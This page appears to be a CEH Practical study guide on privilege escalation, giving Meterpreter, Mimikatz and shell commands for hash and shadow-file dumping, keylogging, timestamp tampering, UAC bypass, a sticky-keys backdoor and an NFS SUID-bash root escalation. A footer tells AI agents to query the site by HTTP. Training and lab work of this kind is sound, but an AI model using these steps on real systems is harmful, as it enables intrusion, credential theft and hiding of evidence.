# 2. Privilege Escalation

## <mark style="color:red;">1. Escalate privileges using Priv Esc tools</mark>

After you have a meterpreter session, use the following command to check the user.

```
getuid
```

We can use **BeRoot** tool to check for further attack vectors.

{% embed url="<https://github.com/AlessandroZ/BeRoot>" %}

uploading with meterpreter. Files go to downloads folder by default

```
upload beroot.exe
```

Now run shell and then execute the file. It will list the attack vectors.

<figure><img src="/files/zG4U3hacCrhPGn3wUsmR" alt=""><figcaption></figcaption></figure>

Note: Windows privileges can be used to escalated privileges. These privileges include SeDebug, SeRestore & SeBackup & SeTakeOwnership, SeTcb & SeCreateToken, SeLoadDriver, and Selmpersonate & SeAssignPrimaryToken. BeRoot lists all available privileges and highlights if you have one of these tokens.

**Ghostpack Seatbelt**

{% embed url="<https://github.com/GhostPack/Seatbelt>" %}

Gather information with following commands

```
Seatbelt.exe -group=all -full
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=misc
```

### Dumping hashes in meterpreter

```
hashdump   // or try the following
use post/windows/gather/smart_hashdump
```

## <mark style="color:red;">2. Post exploitation using Meterpreter</mark>

Useful commands

```
sysinfo
getuid
ifconfig
pwd \\(mostly downloads folder)
ls
cat
cd
keyscan_start //keylogger
keyscan-dump
idletime
```

To modify the timestamp MACE (modified, accessed,created,entry) attributes

```
timestomp secret.ext -m "2/11/2022 8:10:03"
```

To view timestamp entries

```
timestomp secret.ext -v
```

{% hint style="info" %}
-a accessed

-c created

-e entry modified
{% endhint %}

### Finding files in meterpreter

`search -f flag*.txt (in meterpreter)`

### Hidden files in shell

First get the shell, then use the following command.

```
dir /a:h
```

### List all running services in shell

```
sc querytex type=service state=all
```

### Other shell commands

```
netsh firewall show state \\firewall state
netsh firewall show config
wmic cpu get 
wmic /node:"" product get name,version,vendor
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot //restarts system
```

<figure><img src="/files/3ZhLhK3rmCRHiZZHnhUa" alt=""><figcaption></figcaption></figure>

{% embed url="<https://rumble.com/embed/v6nqhxc/?pub=4jw86f>" %}
Linux Privilege Escalation CEH labs complete walkthrough
{% endembed %}

## <mark style="color:red;">3. Linux privilige esc with pkexec</mark>

**CVE (2021-4034)**

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).

{% embed url="<https://github.com/berdav/CVE-2021-4034>" %}

Download and run the script

## <mark style="color:red;">4. Linux priv esc with NFS misconfiguration</mark>

{% embed url="<https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/>" %}
An excellent Tutorial
{% endembed %}

### Configure NFS in Victim

```
sudo apt install nfs-kernel-server
```

open /etc/exports file. This file contains the list of shares you want to share in the network. Add the following entry.

```
/home    *(rw,no_root_squash)
```

{% hint style="info" %}
Home directory is shared and root user can perform read/write
{% endhint %}

restart the server

```
sudo /etc/init.d/nfs-kernel-server restart
```

If we run the nmap scan now, port 2049 will appear as open.

<figure><img src="/files/R32op6FqSxXU1gSoLWsf" alt=""><figcaption></figcaption></figure>

### In Attacking Machine

Now install NFS commons

```
sudo apt install nfs-commons
```

check the mouted folder

```
showmount -e 192.168.18.110
```

Now mount the share

```
mkdir /tmp/nfs
sudo mount -t nfs 19.168.18.110:/home /tmp/nfs
```

Now move to the directory

```
cd /tmp/nfs
cp /bin/bash .
chmod +s bash   //allows the group to execute it
ls -la bash
```

to check free space

```
sudo df -h
```

<figure><img src="/files/Kl9HKd4BEG2gZARv7D1h" alt=""><figcaption></figcaption></figure>

Now ssh into the machine. Move to the shared directory and run bash and we will get the root shell.

```
cd /home
./bash -p
```

useful commands post exploitation

```
id
whoami
cat etc/cronjobs
find / -name *.txt -ls 2>/dev/null  to list all text files in system
route -n  host/network names in binary format
```

Now copy nano to current directory and then read shadow file

```
sudo cp /bin/nano .
./nano -p /etc/shadow
```

To see running processes

```
ps -ef
```

To view executable binaries

```
find / -perm -4000 *.txt -ls 2>/dev/null
```

## 5. Escalate privliges bypassing UAC and sticky keys

After you have a meterpreter session background it and then use the following exploit

```
use exploit/windows/local/bypassuac_fodhelper
```

Then once you get a new meterpreter session, use the following command

```
getsystem -t 1
```

To view the current sessions, you can use the following command.

```
sessions -i*
```

**Using sticky keys to priv esc on Win 11**

After the initial meterpreter session, use the following module.

```
use post/windows/manage/sticky_keys
```

Now set the already priv escalated session in options and exploit it.

Now on Windows 11 , sign in with a normal user and once you press the stick keys(shift 5 times), you will get cmd as admin.

## <mark style="color:red;">6. Priv esc using Mimikatz</mark>

Metasploit has built in module for mimikatz call kiwi.

First get a meterpreter session. Escalate privilege using bypassuac.

In meterpreter load the module

```
load kiwi
help kiwi \\to see help
```

<figure><img src="/files/zaDDtG04acLswohvTjnK" alt=""><figcaption></figcaption></figure>

to dump hashes

```
lsa_dump_sam
```

We can also dump LSA Secrets using the following command. LSA secrets are used to manage local system security policy. it may contain passwords, IE passwords, SQL passwords etc

change the password with kiwi with hash without knowing the original password.

```
password_change -u raj -p 123 -P 9876
password_change -u raj -n <NTLM-hash> -P 1234
```

### CEH v13 Practical Course

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ceh-practical.cavementech.com/module-6.-system-hacking/2.-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.